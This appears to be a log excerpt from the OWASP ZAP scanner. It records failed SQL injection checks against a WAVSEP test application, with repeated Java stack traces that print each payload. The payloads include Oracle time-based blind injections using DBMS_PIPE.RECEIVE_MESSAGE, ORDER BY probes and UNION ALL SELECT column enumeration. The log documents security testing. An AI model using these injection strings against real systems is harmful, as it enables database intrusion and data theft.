[content.ini AND 1409=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(65)||CHR(113)||CHR(68),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 1409=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(65)||CHR(113)||CHR(68),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688316 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5445=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(83)||CHR(88)||CHR(108),5) AND ('RKEP'='RKEP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND 5445=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(83)||CHR(88)||CHR(108),5) AND ('RKEP'='RKEP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688318 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 7977=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(106)||CHR(106)||CHR(87),5) AND 'WfCk'='WfCk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND 7977=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(106)||CHR(106)||CHR(87),5) AND 'WfCk'='WfCk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688319 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 8025=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(68)||CHR(111)||CHR(88),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND 8025=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(68)||CHR(111)||CHR(88),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688320 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7032=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(80)||CHR(85)||CHR(99),5)-- zlZx] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 7032=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(80)||CHR(85)||CHR(99),5)-- zlZx at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688321 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688322 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 8693-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) ORDER BY 8693-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688322 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688324 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688325 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688326 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688327 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688329 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688330 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at 